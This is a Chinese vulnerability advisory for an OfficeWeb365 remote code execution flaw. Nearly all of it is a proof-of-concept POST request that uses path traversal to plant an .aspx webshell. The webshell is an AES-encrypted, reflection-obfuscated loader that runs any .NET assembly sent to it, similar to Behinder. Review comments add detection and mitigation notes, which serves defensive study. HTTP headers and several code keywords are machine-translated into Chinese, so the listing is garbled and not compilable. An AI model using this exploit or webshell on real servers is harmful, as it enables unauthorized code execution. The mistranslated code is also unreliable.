

OfficeWeb365 远程代码执行漏洞.md


【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453。

# 详细

POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人:xxx
用户代理:Mozilla/5.0(Macintosh;Intel Mac OS X 10_15_7)AppleWebKit/537.36(KHTML,如 Gecko)Chrome/88.0.434.18 Safari/537.36
内容长度:2265
内容类型:application/x-www-form-urlencoded
接受编码:gzip、deflate
连接:关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
    <%@Import 命名空间="System.Reflection" %>
    <脚本运行=“服务器”>
               // Decrypt helper of the uploaded page: treats the input bytes as UTF-8 text,
               // Base64-decodes that text, then decrypts the result with Rijndael/AES in ECB
               // mode with PKCS7 padding, using a key hard-coded in the page.
               // NOTE(review): the declaration line and the `字符串键` / `数据` identifiers look
               // machine-translated; the untranslated lines below refer to `key` and `data`,
               // so the listing as printed is not compilable source.
               私有字节[]解密(字节[]数据)
        {
            // Static key embedded in the file. This value matches the widely published
            // default key of the Behinder (冰蝎) webshell client, which makes it a usable
            // static signature for file and content scanning; it can be changed by whoever
            // generates the page, so absence of this string does not mean a file is clean.
            字符串键=“e45e329feb5d925b”;
            // Request body is expected as Base64 text, not raw ciphertext.
            数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            // ECB with no IV: identical plaintext blocks produce identical ciphertext
            // blocks, so traffic encrypted under a known key can be decrypted offline
            // during incident response.
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
        // Encrypt helper, the mirror of the decrypt helper: encrypts the input with
        // Rijndael/AES in ECB mode with PKCS7 padding under the same hard-coded key, then
        // returns the Base64 text of the ciphertext as UTF-8 bytes.
        // It is not called anywhere in the inline code shown on this page.
        // NOTE(review): the declaration line, `字符串键` and `返回` look machine-translated;
        // the untranslated lines refer to `key` and `data`.
        私有字节[]加密(字节[]数据)
        {
            // Same static key value as in the decrypt helper; see it as a scanning indicator.
            字符串键=“e45e329feb5d925b”;
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            // Output is Base64 text, matching the input format the decrypt helper expects.
            返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
        }
    </脚本>
        <%
        // Inline page code: reads the whole request body, passes it through Decrypt, loads
        // the result as a .NET assembly in the web application's process and instantiates a
        // type from it. Anything that can send a request to this page and knows the embedded
        // key therefore gets code execution with the application pool's privileges.
        // The commented-out line below is the direct form of the same logic; the live lines
        // reach the same calls through reflection with the type and class names built from
        // byte arrays, so the literal strings never appear in the file.
        // Detection note: signatures keyed on the literal text "Assembly.Load" will miss
        // this variant. More robust signals are an .aspx file appearing under a static
        // content directory (the request above writes to Content/img via "../" in `path`),
        // page code that feeds Request.BinaryRead into a reflective Load, and the hard-coded
        // key string. Mitigation on the server side is to reject traversal sequences and
        // script extensions in the SaveDraw `path` / `idx` parameters and to disable script
        // execution in upload and image directories.
        //byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
                byte[] c=Request.BinaryRead(Request.ContentLength);
          // The byte array is the ASCII text "System.Reflection.Assembly".
          string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
          // NOTE(review): `类型程序集` looks machine-translated; later lines use `assembly`.
          类型程序集=Type.GetType(asname);
           // Resolves the Load overload that takes a single byte[] argument.
           MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
           // Static call (null target): loads the decrypted request body as an assembly.
           对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
           // Resolves the CreateInstance overload that takes a single string argument.
           MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
           // 0x55 is ASCII "U", the class name used in the commented-out direct form.
           字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
           object pay=create.Invoke(obj,new object[] { name });
           // Equals is called with the page object as argument; what the loaded type does
           // with it is defined by the delivered assembly and is not visible here.
           pay.Equals(this);%>>---